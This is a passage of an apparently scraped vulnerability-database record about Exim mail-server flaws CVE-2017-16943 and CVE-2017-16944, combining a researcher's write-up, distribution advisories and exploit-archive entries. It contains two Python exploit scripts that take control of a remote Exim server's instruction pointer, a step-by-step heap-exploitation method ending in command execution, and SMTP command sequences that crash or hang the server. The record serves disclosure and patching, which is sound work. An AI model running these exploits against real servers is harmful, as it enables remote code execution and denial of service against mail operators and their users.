whether the old store is the latest store allocated in `current_block`. It returns False immediately if the check fails.\n[store.c: 276 store_extend](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/store.c#L276)\n```c\nif (CS ptr + rounded_oldsize != CS (next_yield[store_pool]) ||\n inc > yield_length[store_pool] + rounded_oldsize - oldsize)\n return FALSE;\n```\nOnce `store_extend` fails, exim tries to get a new store and release the old one. After looking into `store_get` and `store_release`, we found that `store_get` returns a **store**, but `store_release` releases a **block** if the store is at the head of it. 
That is to say, if `next->text` points to the start of the `current_block` and `store_get` cuts a store inside it for `newtext`, then `store_release(next->text)` frees `next->text`, which is equal to `current_block`, and leaves `newtext` and `current_block` pointing to a freed memory area. Any further usage of these pointers leads to a use-after-free vulnerability. To trigger this bug, we need to make exim call `store_get` after `next->text` is allocated. This was impossible until the BDAT command was introduced into exim. BDAT makes `store_get` reachable and finally leads to an RCE.\nExim uses [function pointers](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/globals.h#L136) to switch between different input sources, such as `receive_getc`, `receive_getbuf`. When receiving BDAT data, `receive_getc` is set to `bdat_getc` in order to check the remaining chunking data size and to handle the command following BDAT. In `receive_msg`, exim also uses `receive_getc`. It loops to read data, storing the data into `next->text` and extending it if it is insufficient.\n[receive.c: 1817 receive_msg](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/receive.c#L1789)\n```c\nfor (;;)\n {\n int ch = (receive_getc)(GETC_BUFFER_UNLIMITED);\n \n /* If we hit EOF on a SMTP connection, it's an error, since incoming\n SMTP must have a correct \".\" terminator. */\n\n if (ch == EOF && smtp_input /* && !smtp_batched_input */)\n {\n smtp_reply = handle_lost_connection(US\" (header)\");\n smtp_yield = FALSE;\n goto TIDYUP; /* Skip to end of function */\n }\n```\nIn `bdat_getc`, once the SIZE is reached, it tries to read the next BDAT command and raises an error message if the following command is incorrect. 
\n[smtp_in.c: 628 bdat_getc](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/smtp_in.c#L628)\n```c\n case BDAT_CMD:\n {\n int n;\n\n if (sscanf(CS smtp_cmd_data, \"%u %n\", &chunking_datasize, &n) < 1)\n\t{\n\t(void) synprot_error(L_smtp_protocol_error, 501, NULL,\n\t US\"missing size for BDAT command\");\n\treturn ERR;\n\t}\n```\nIn exim, it usually calls `synprot_error` to raise error message, which also logs at the same time.\n[smtp_in.c: 628 bdat_getc](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/smtp_in.c#L2984)\n```c\nstatic int\nsynprot_error(int type, int code, uschar *data, uschar *errmess)\n{\nint yield = -1;\n\nlog_write(type, LOG_MAIN, \"SMTP %s error in \\\"%s\\\" %s %s\",\n (type == L_smtp_syntax_error)? \"syntax\" : \"protocol\",\n string_printing(smtp_cmd_buffer), host_and_ident(TRUE), errmess);\n```\nThe log messages are printed by string_printing. This function ensures a string is printable. For this reason, it extends the string to transfer characters if any unprintable character exists, such as `'\\n'->'\\\\n'`. Therefore, it asks `store_get` for memory to store strings.\nThis store makes ` if (!store_extend(next->text, oldsize, header_size))` in `receive_msg` failed when next extension occurs and then triggers use-after-free.\n\n### Exploitation\nThe following is the Proof-of-Concept(PoC) python script of this vulnerability. This PoC controls the control flow of SMTP server and sets instruction pointer to `0xdeadbeef`. For fuzzing issue, we did change the runtime configuration of exim. As a result, this PoC works only when **dkim** is enabled. We use it as an example because the situation is less complicated. 
The version with default configuration is also exploitable, and we will discuss it at the end of this section.\n```python\n# CVE-2017-16943 PoC by meh at DEVCORE\n# pip install pwntools\nfrom pwn import *\n\nr = remote('127.0.0.1', 25)\n\nr.recvline()\nr.sendline(\"EHLO test\")\nr.recvuntil(\"250 HELP\")\nr.sendline(\"MAIL FROM:<meh@some.domain>\")\nr.recvline()\nr.sendline(\"RCPT TO:<meh@some.domain>\")\nr.recvline()\nr.sendline('a'*0x1250+'\\x7f')\nr.recvuntil('command')\nr.sendline('BDAT 1')\nr.sendline(':BDAT \\x7f')\ns = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)\nr.send(s+ ':\\r\\n')\nr.recvuntil('command')\nr.send('\\n')\n\nr.interactive()\n```\n\n1. Running out of `current_block`\n In order to achieve code execution, we need to make the `next->text` get the first store of a block. That is, running out of `current_block` and making `store_get` allocate a new block. Therefore, we send a long message `'a'*0x1250+'\\x7f'` with an unprintable character to cut `current_block`, making `yield_length` less than 0x100.\n\n\n2. Starts BDAT data transfer\n After that, we send BDAT command to start data transfer. At the beginning, `next` and `next->text` are allocated by `store_get`. \n \n The function `dkim_exim_verify_init` is called sequentially and it also calls `store_get`. Notice that this function uses **ANOTHER `store_pool`**, so it allocates from heap without changing `current_block` which `next->text` also points to.\n[receive.c: 1734 receive_msg](https://github.com/Exim/exim/blob/e924c08b7d031b712013a7a897e2d430b302fe6c/src/src/receive.c#L1734)\n ```c\n if (smtp_input && !smtp_batched_input && !dkim_disable_verify)\n dkim_exim_verify_init(chunking_state <= CHUNKING_OFFERED);\n ```\n\n3. Call `store_getc` inside `bdat_getc`\n Then, we send a BDAT command without SIZE. Exim complains about the incorrect command and cuts the `current_block` with `store_get` in `string_printing`. \n\n\n4. 
Keep sending msg until extension and bug triggered\n In this way, while we keep sending huge messages, `current_block` gets freed after the extension. In the malloc.c of glibc (so called ptmalloc), system manages a linked list of freed memory chunks, which is called unsortbin. Freed chunks are put into unsortbin if it is not the last chunk on the heap. In step 2, `dkim_exim_verify_init` allocated chunks after `next->text`. Therefore, this chunk is put into unsortbin and the pointers of linked list are stored into the first 16 bytes of chunk (on x86-64). The location written is exactly `current_block->next`, and therefore `current_block->next` is overwritten to `unsortbin` inside `main_arena` of libc (linked list pointer `fd` points back to `unsortbin` if no other freed chunk exists). \n\n\n5. Keep sending msg for the next extension\n When the next extension occurs, `store_get` tries to cut from `main_arena`, which makes attackers able to overwrite all global variables below main_arena. \n6. Overwrite global variables in libc\n7. Finish sending message and trigger `free()`\n In the PoC, we simply modified `__free_hook` and ended the line. Exim calls `store_reset` to reset the buffer and calls `__free_hook` in `free()`. At this stage, we successfully controlled instruction pointer `$rip`.\n However, this is not enough for an RCE because the arguments are uncontrollable. As a result, we improved this PoC to modify both `__free_hook` and `_IO_2_1_stdout_`. We forged the vtable of `stdout` and set `__free_hook` to any call of `fflush(stdout)` inside exim. When the program calls fflush, it sets the first argument to stdout and jumps to a function pointer on the vtable of stdout. Hence, we can control both `$rip` and the content of first argument. \n We consulted past CVE exploits and decided to call `expand_string`, which executes command with `execv` if we set the first argument to `${run{cmd}}`, and finally we got our RCE. 
\n \n\n\n#### Exploit for default configured exim\nWhen dkim is disabled, the PoC above fails because `current_block` is the last chunk on the heap. This makes the system merge it into a big chunk called **top chunk** rather than unsortbin.\nThe illustrations below describe the difference in heap layout:\n\n\n\nTo avoid this, we need to make exim allocate and free some memory before we actually start our exploitation. Therefore, we add some steps between step 1 and step 2.\n\nAfter running out of `current_block`:\n1. Use DATA command to send lots of data\n Send huge data, make the chunk big and extend many times. After several extensions, it calls `store_get` to retrieve a bigger store and then releases the old one. This repeats many times if the data is long enough. Therefore, we have a big chunk in unsortbin.\n2. End DATA transfer and start a new email\n Restart to send an email with BDAT command after the heap chunk is prepared.\n3. Adjust `yield_length` again\n Send an invalid command with an unprintable character again to cut the `current_block`.\n\nFinally, the heap layout looks like:\n\n\nAnd now we can go back to step 2 at the beginning and create the same situation. 
When `next->text` is freed, it goes back to unsortbin and we are able to overwrite libc global variables again.\nThe following is the PoC for default configured exim:\n```python\n# CVE-2017-16943 PoC by meh at DEVCORE\n# pip install pwntools\nfrom pwn import *\n\nr = remote('localhost', 25)\n\nr.recvline()\nr.sendline(\"EHLO test\")\nr.recvuntil(\"250 HELP\")\nr.sendline(\"MAIL FROM:<>\")\nr.recvline()\nr.sendline(\"RCPT TO:<meh@some.domain>\")\nr.recvline()\nr.sendline('a'*0x1280+'\\x7f')\nr.recvuntil('command')\nr.sendline('DATA')\nr.recvuntil('itself\\r\\n')\nr.sendline('b'*0x4000+':\\r\\n')\nr.sendline('.\\r\\n')\nr.sendline('.\\r\\n')\nr.recvline()\nr.sendline(\"MAIL FROM:<>\")\nr.recvline()\nr.sendline(\"RCPT TO:<meh@some.domain>\")\nr.recvline()\nr.sendline('a'*0x3480+'\\x7f')\nr.recvuntil('command')\nr.sendline('BDAT 1')\nr.sendline(':BDAT \\x7f')\ns = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)\nr.send(s+ ':\\r\\n')\nr.send('\\n')\nr.interactive()\n```\n\nA demo of our exploit is as below.\n\nNote that we have not found a way to leak memory address and therefore we use heap spray instead. It requires another information leakage vulnerability to overcome the PIE mitigation on x86-64.\n\n## Impact\n\nRemote code execution on remote mail server, affecting over 500k mail servers.", "modified": "2019-11-12T23:45:11", "published": "2017-12-11T15:51:58", "id": "H1:296991", "href": "https://hackerone.com/reports/296991", "type": "hackerone", "title": "The Internet: Exim use-after-free vulnerability while reading mail header involving BDAT commands", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2018-03-06T22:38:40", "bulletinFamily": "unix", "description": "### Background\n\nExim is a message transfer agent (MTA) designed to be a a highly configurable, drop-in replacement for sendmail. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Exim. Please review the CVE identifiers referenced below for details. 
\n\n### Impact\n\nA remote attacker, by connecting to the SMTP listener daemon, could possibly execute arbitrary code with the privileges of the process or cause a Denial of Service condition. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Exim users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=mail-mta/exim-4.90.1\"", "modified": "2018-03-06T00:00:00", "published": "2018-03-06T00:00:00", "href": "https://security.gentoo.org/glsa/201803-01", "id": "GLSA-201803-01", "title": "Exim: Multiple vulnerabilities", "type": "gentoo", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitdb": [{"lastseen": "2017-11-27T21:01:07", "bulletinFamily": "exploit", "description": "Exim 4.89 - 'BDAT' Denial of Service. CVE-2017-16944. Dos exploit for Multiple platform. Tags: Denial of Service (DoS)", "modified": "2017-11-27T00:00:00", "published": "2017-11-27T00:00:00", "id": "EDB-ID:43184", "href": "https://www.exploit-db.com/exploits/43184/", "type": "exploitdb", "title": "Exim 4.89 - 'BDAT' Denial of Service", "sourceData": "While parsing the BDAT data header, exim still scans for '.' and considers it the end of the mail.\r\nhttps://github.com/Exim/exim/blob/master/src/src/receive.c#L1867\r\n\r\nExim goes into an incorrect state after this message is sent because the function pointer receive_getc is not reset. If the following command is also a BDAT, receive_getc and lwr_receive_getc become the same and an infinite loop occurs inside bdat_getc. 
Program crashes due to running out of stack.\r\nhttps://github.com/Exim/exim/blob/master/src/src/smtp_in.c#L547\r\n\r\nHere is a simple PoC which leads to an infinite loop and program crash:\r\n\r\nEHLO localhost\r\nMAIL FROM:<test@localhost>\r\nRCPT TO:<test@localhost>\r\nBDAT 10\r\n.\r\nBDAT 0\r\n\r\n\r\nPart of debug info\r\n============================\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30295 child 30502 ended: status=0x8b\r\n15:36:54 30295 signal exit, signal 11 (core dumped)\r\n15:36:54 30295 1 SMTP accept process now running\r\n15:36:54 30295 Listening...\r\n============================\r\n\r\nWe also found that this vulnerability can make exim hang(go into an infinite loop without crashing and run forever) even the connection is closed. 
It seems like this can be used to raise a resource based DoS attack.\r\nThis can be triggered using the following command:\r\n\r\nEHLO localhost\r\nMAIL FROM:<test@localhost>\r\nRCPT TO:<test@localhost>\r\nBDAT 100\r\n.\r\nMAIL FROM:<test@localhost>\r\nRCPT TO:<test@localhost>\r\nBDAT 0 LAST\r\n\r\n// Tested on current master, ubuntu16.04.", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/43184/"}], "zdt": [{"lastseen": "2018-03-20T05:15:06", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2017-11-27T00:00:00", "published": "2017-11-27T00:00:00", "href": "https://0day.today/exploit/description/29068", "id": "1337DAY-ID-29068", "title": "Exim 4.89 - BDAT Denial of Service Exploit", "type": "zdt", "sourceData": "While parsing BDAT data header, exim still scans for '.' and consider it the end of mail.\r\nhttps://github.com/Exim/exim/blob/master/src/src/receive.c#L1867\r\n \r\nExim goes into an incorrect state after this message is sent because the function pointer receive_getc is not reset. If the following command is also a BDAT, receive_getc and lwr_receive_getc become the same and an infinite loop occurs inside bdat_getc. 
Program crashes due to running out of stack.\r\nhttps://github.com/Exim/exim/blob/master/src/src/smtp_in.c#L547\r\n \r\nHere is a simple PoC which leads to an infinite loop and program crash:\r\n \r\nEHLO localhost\r\nMAIL FROM:<[email\u00a0protected]>\r\nRCPT TO:<[email\u00a0protected]>\r\nBDAT 10\r\n.\r\nBDAT 0\r\n \r\n \r\nPart of debug info\r\n============================\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30502 SMTP>> 250 0 byte chunk received\r\n15:36:54 30502 chunking state 0\r\n15:36:54 30295 child 30502 ended: status=0x8b\r\n15:36:54 30295 signal exit, signal 11 (core dumped)\r\n15:36:54 30295 1 SMTP accept process now running\r\n15:36:54 30295 Listening...\r\n============================\r\n \r\nWe also found that this vulnerability can make exim hang(go into an infinite loop without crashing and run forever) even the connection is closed. 
It seems like this can be used to raise a resource based DoS attack.\r\nThis can be triggered using the following command:\r\n \r\nEHLO localhost\r\nMAIL FROM:<[email\u00a0protected]>\r\nRCPT TO:<[email\u00a0protected]>\r\nBDAT 100\r\n.\r\nMAIL FROM:<[email\u00a0protected]>\r\nRCPT TO:<[email\u00a0protected]>\r\nBDAT 0 LAST\r\n \r\n// Tested on current master, ubuntu16.04.\n\n# 0day.today [2018-03-20] #", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/29068"}, {"lastseen": "2018-01-09T15:16:49", "bulletinFamily": "exploit", "description": "Exploit for multiple platform in category dos / poc", "modified": "2017-11-30T00:00:00", "published": "2017-11-30T00:00:00", "href": "https://0day.today/exploit/description/29082", "id": "1337DAY-ID-29082", "type": "zdt", "title": "Exim Use-After-Free Exploit", "sourceData": "On 25 November 2017 Phil Pennock announced the new release of Exim which included a fix for a use-after-free vulnerability which can result in Remote Code Execution (RCE). The vulnerability was reported by a user with the handle \u201cmeh\u201d and it all starts in receive.c.\r\n\r\nBOOL\r\nreceive_msg(BOOL extract_recip)\r\n{\r\n ...\r\n /* See if we are at the current header's size limit - there must be at least\r\n four bytes left. This allows for the new character plus a zero, plus two for\r\n extra insertions when we are playing games with dots and carriage returns. If\r\n we are at the limit, extend the text buffer. This could have been done\r\n automatically using string_cat() but because this is a tightish loop storing\r\n only one character at a time, we choose to do it inline. Normally\r\n store_extend() will be able to extend the block; only at the end of a big\r\n store block will a copy be needed. 
To handle the case of very long headers\r\n (and sometimes lunatic messages can have ones that are 100s of K long) we\r\n call store_release() for strings that have been copied - if the string is at\r\n the start of a block (and therefore the only thing in it, because we aren't\r\n doing any other gets), the block gets freed. We can only do this because we\r\n know there are no other calls to store_get() going on. */\r\n\r\n if (ptr >= header_size - 4)\r\n {\r\n int oldsize = header_size;\r\n /* header_size += 256; */\r\n header_size *= 2;\r\n if (!store_extend(next->text, oldsize, header_size))\r\n {\r\n uschar *newtext = store_get(header_size);\r\n memcpy(newtext, next->text, ptr);\r\n store_release(next->text);\r\n next->text = newtext;\r\n }\r\n }\r\n ...\r\n}\r\n\r\nThe above function is used to parse the received messages and the specific snippet is related to the buffer that stores the header. If the header is too small the code will use store_extend() which will try to resize \u201cnext->text\u201d from \u201coldsize\u201d to \u201cheader_size\u201d. As the original reporter noticed, store_extend() will fail if there is some other allocation between the allocation and the extension. 
This can be seen in store.c, as shown below.\r\n\r\nBOOL\r\nstore_extend_3(void *ptr, int oldsize, int newsize, const char *filename,\r\n int linenumber)\r\n{\r\nint inc = newsize - oldsize;\r\nint rounded_oldsize = oldsize;\r\n\r\nif (rounded_oldsize % alignment != 0)\r\n rounded_oldsize += alignment - (rounded_oldsize % alignment);\r\n\r\nif (CS ptr + rounded_oldsize != CS (next_yield[store_pool]) ||\r\n inc > yield_length[store_pool] + rounded_oldsize - oldsize)\r\n return FALSE;\r\n ...\r\n}\r\n\r\nIf we go back to receive_msg() we see that, when the extension fails, store_get() is called with \u201cheader_size\u201d; looking at this function in store.c shows that it simply carves the request out of the current block by advancing next_yield.\r\n\r\nvoid *\r\nstore_get_3(int size, const char *filename, int linenumber)\r\n{\r\n ...\r\n(void) VALGRIND_MAKE_MEM_UNDEFINED(store_last_get[store_pool], size);\r\n/* Update next pointer and number of bytes left in the current block. */\r\n\r\nnext_yield[store_pool] = (void *)(CS next_yield[store_pool] + size);\r\nyield_length[store_pool] -= size;\r\n\r\nreturn store_last_get[store_pool];\r\n\r\nThe next function invoked by receive_msg() is store_release(), which, as its name implies, frees the whole storeblock whose data starts at \u201cnext->text\u201d (see the pointer comparison and free(bb) below). When the preceding store_get() was satisfied from the remaining space of that same block, the freshly returned \u201cnewtext\u201d, and anything else allocated after \u201cnext->text\u201d, lives inside the block that has just been freed, so subsequent writes into the header buffer are a use-after-free. Below you can see the store_release() function as defined in store.c.\r\n\r\nvoid\r\nstore_release_3(void *block, const char *filename, int linenumber)\r\n{\r\nstoreblock *b;\r\n\r\n/* It will never be the first block, so no need to check that. 
*/\r\n\r\nfor (b = chainbase[store_pool]; b != NULL; b = b->next)\r\n {\r\n storeblock *bb = b->next;\r\n if (bb != NULL && CS block == CS bb + ALIGNED_SIZEOF_STOREBLOCK)\r\n {\r\n b->next = bb->next;\r\n pool_malloc -= bb->length + ALIGNED_SIZEOF_STOREBLOCK;\r\n\r\n /* Cut out the debugging stuff for utilities, but stop picky compilers\r\n from giving warnings. */\r\n\r\n #ifdef COMPILE_UTILITY\r\n filename = filename;\r\n linenumber = linenumber;\r\n #else\r\n DEBUG(D_memory)\r\n {\r\n if (running_in_test_harness)\r\n debug_printf(\"-Release %d\\n\", pool_malloc);\r\n else\r\n debug_printf(\"-Release %6p %-20s %4d %d\\n\", (void *)bb, filename,\r\n linenumber, pool_malloc);\r\n }\r\n if (running_in_test_harness)\r\n memset(bb, 0xF0, bb->length+ALIGNED_SIZEOF_STOREBLOCK);\r\n #endif /* COMPILE_UTILITY */\r\n\r\n free(bb);\r\n return;\r\n }\r\n }\r\n}\r\n\r\nTo fix this vulnerability, Jeremy Harris introduced the following patch which introduces \u201crelease_ok\u201d that checks that \u201cstore_last_get[store_pool]\u201d points to the same location as \u201cnext->text\u201d before proceeding with the store_release() invocation.\r\n\r\n if (!store_extend(next->text, oldsize, header_size))\r\n {\r\n+ BOOL release_ok = store_last_get[store_pool] == next->text;\r\n uschar *newtext = store_get(header_size);\r\n memcpy(newtext, next->text, ptr);\r\n- store_release(next->text);\r\n+ if (release_ok) store_release(next->text);\r\n next->text = newtext;\r\n\r\nTo prove the exploitability of this vulnerability, \u201cmeh\u201d uploaded a Python Proof-of-Concept exploit that manages to overwrite the instruction pointer with 0xdeadbeef on Ubuntu 16.04 with the latest release of Exim. 
You can see the Python PoC exploit below.\r\n\r\n# pip install pwntools\r\nfrom pwn import *\r\n\r\nr = remote('127.0.0.1', 25)\r\n\r\nr.recvline()\r\nr.sendline(\"EHLO test\")\r\nr.recvuntil(\"250 HELP\")\r\nr.sendline(\"MAIL FROM:<[email\u00a0protected]>\")\r\nr.recvline()\r\nr.sendline(\"RCPT TO:<[email\u00a0protected]>\")\r\nr.recvline()\r\nr.sendline('a'*0x1250+'\\x7f')\r\nr.recvuntil('command')\r\nr.sendline('BDAT 1')\r\nr.sendline(':BDAT \\x7f')\r\ns = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)\r\nr.send(s+ ':\\r\\n')\r\nr.recvuntil('command')\r\nr.send('\\n')\r\nr.interactive()\r\n\r\nThe PoC opens an SMTP session with EHLO and begins constructing a message. Then comes the odd \u201cr.sendline(\u2018a\u2019*0x1250+\u2019\\x7f\u2019)\u201d, an unrecognized command whose only purpose is to consume pool space so that \u201cyield_length\u201d drops below 0x100. The next command sets the BDAT length to 1 and is followed by a single non-printable byte, which pushes the header buffer to the size limit described above and so forces the store_get() path. While Exim is still reading the header in receive_msg(), the author of the PoC sends the large constructed payload, which lands in the buffer released by store_release() and, as the crash below shows, ends up controlling the instruction pointer. Note that the PoC is written for Python 2 (for example, 0x1e00/8 relies on integer division). You can see the result of this (as shown by the PoC author) below.\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x00000000deadbeef in ?? 
()\r\n(gdb)\r\n\r\n\r\nPOC Exploit:\r\n\r\n# pip install pwntools\r\nfrom pwn import *\r\n \r\nr = remote('127.0.0.1', 25)\r\n \r\nr.recvline()\r\nr.sendline(\"EHLO test\")\r\nr.recvuntil(\"250 HELP\")\r\nr.sendline(\"MAIL FROM:<[email\u00a0protected]>\")\r\nr.recvline()\r\nr.sendline(\"RCPT TO:<[email\u00a0protected]>\")\r\nr.recvline()\r\nr.sendline('a'*0x1250+'\\x7f')\r\nr.recvuntil('command')\r\nr.sendline('BDAT 1')\r\nr.sendline(':BDAT \\x7f')\r\ns = 'a'*6 + p64(0xdeadbeef)*(0x1e00/8)\r\nr.send(s+ ':\\r\\n')\r\nr.recvuntil('command')\r\nr.send('\\n')\r\nr.interactive()\r\n\r\n\r\nSource\r\nhttps://xorl.wordpress.com/2017/11/26/cve-2017-16943-exim-use-after-free/\r\n\n\n# 0day.today [2018-01-09] #", "sourceHref": "https://0day.today/exploit/29082", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2017-12-01T06:03:25", "bulletinFamily": "exploit", "description": "", "modified": "2017-11-27T00:00:00", "published": "2017-11-27T00:00:00", "href": "https://packetstormsecurity.com/files/145152/Exim-4.89-Denial-Of-Service.html", "id": "PACKETSTORM:145152", "type": "packetstorm", "title": "Exim 4.89 Denial Of Service", "sourceData": "`While parsing BDAT data header, exim still scans for '.' and consider it the end of mail. \nhttps://github.com/Exim/exim/blob/master/src/src/receive.c#L1867 \n \nExim goes into an incorrect state after this message is sent because the function pointer receive_getc is not reset. If the following command is also a BDAT, receive_getc and lwr_receive_getc become the same and an infinite loop occurs inside bdat_getc. Program crashes due to running out of stack. \nhttps://github.com/Exim/exim/blob/master/src/src/smtp_in.c#L547 \n \nHere is a simple PoC which leads to an infinite loop and program crash: \n \nEHLO localhost \nMAIL FROM:<test@localhost> \nRCPT TO:<test@localhost> \nBDAT 10 \n. 
\nBDAT 0 \n \n \nPart of debug info \n============================ \n15:36:54 30502 SMTP>> 250 0 byte chunk received \n15:36:54 30502 chunking state 0 \n15:36:54 30502 SMTP>> 250 0 byte chunk received \n15:36:54 30502 chunking state 0 \n15:36:54 30502 SMTP>> 250 0 byte chunk received \n15:36:54 30502 chunking state 0 \n15:36:54 30502 SMTP>> 250 0 byte chunk received \n15:36:54 30502 chunking state 0 \n15:36:54 30502 SMTP>> 250 0 byte chunk received \n15:36:54 30502 chunking state 0 \n15:36:54 30502 SMTP>> 250 0 byte chunk received \n15:36:54 30502 chunking state 0 \n15:36:54 30502 SMTP>> 250 0 byte chunk received \n15:36:54 30502 chunking state 0 \n15:36:54 30502 SMTP>> 250 0 byte chunk received \n15:36:54 30502 chunking state 0 \n15:36:54 30502 SMTP>> 250 0 byte chunk received \n15:36:54 30502 chunking state 0 \n15:36:54 30295 child 30502 ended: status=0x8b \n15:36:54 30295 signal exit, signal 11 (core dumped) \n15:36:54 30295 1 SMTP accept process now running \n15:36:54 30295 Listening... \n============================ \n \nWe also found that this vulnerability can make exim hang(go into an infinite loop without crashing and run forever) even the connection is closed. It seems like this can be used to raise a resource based DoS attack. \nThis can be triggered using the following command: \n \nEHLO localhost \nMAIL FROM:<test@localhost> \nRCPT TO:<test@localhost> \nBDAT 100 \n. \nMAIL FROM:<test@localhost> \nRCPT TO:<test@localhost> \nBDAT 0 LAST \n \n// Tested on current master, ubuntu16.04. \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/145152/exim489-dos.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "ubuntu": [{"lastseen": "2019-05-29T19:21:04", "bulletinFamily": "unix", "description": "It was discovered that Exim incorrectly handled certain BDAT data headers. 
A remote attacker could possibly use this issue to cause Exim to crash, resulting in a denial of service.", "modified": "2017-11-29T00:00:00", "published": "2017-11-29T00:00:00", "id": "USN-3499-1", "href": "https://usn.ubuntu.com/3499-1/", "title": "Exim vulnerability", "type": "ubuntu", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T19:21:38", "bulletinFamily": "unix", "description": "It was discovered that Exim incorrectly handled memory in the ESMTP CHUNKING extension. A remote attacker could use this issue to cause Exim to crash, resulting in a denial of service, or possibly execute arbitrary code. The default compiler options for affected releases should reduce the vulnerability to a denial of service.", "modified": "2017-11-27T00:00:00", "published": "2017-11-27T00:00:00", "id": "USN-3493-1", "href": "https://usn.ubuntu.com/3493-1/", "title": "Exim vulnerability", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:32:05", "bulletinFamily": "unix", "description": "\nExim developers team reports:\n\nThe receive_msg function in receive.c in the SMTP daemon in Exim 4.88 and 4.89 allows remote attackers to cause a denial of service (infinite loop and stack exhaustion) via vectors involving BDAT commands and an improper check for a '.' 
character signifying the end of the content, related to the bdat_getc function.\n\n", "modified": "2017-11-23T00:00:00", "published": "2017-11-23T00:00:00", "id": "75DD622C-D5FD-11E7-B9FE-C13EB7BCBF4F", "href": "https://vuxml.freebsd.org/freebsd/75dd622c-d5fd-11e7-b9fe-c13eb7bcbf4f.html", "title": "exim -- remote DoS attack in BDAT processing", "type": "freebsd", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "suse": [{"lastseen": "2017-12-06T07:02:59", "bulletinFamily": "unix", "description": "This update for exim fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2017-16943: Fix possible remote code execution (boo#1069857).\n\n", "modified": "2017-12-06T03:08:53", "published": "2017-12-06T03:08:53", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00009.html", "id": "OPENSUSE-SU-2017:3220-1", "title": "Security update for exim (important)", "type": "suse", "cvss": {"score": 0.0, "vector": "NONE"}}]}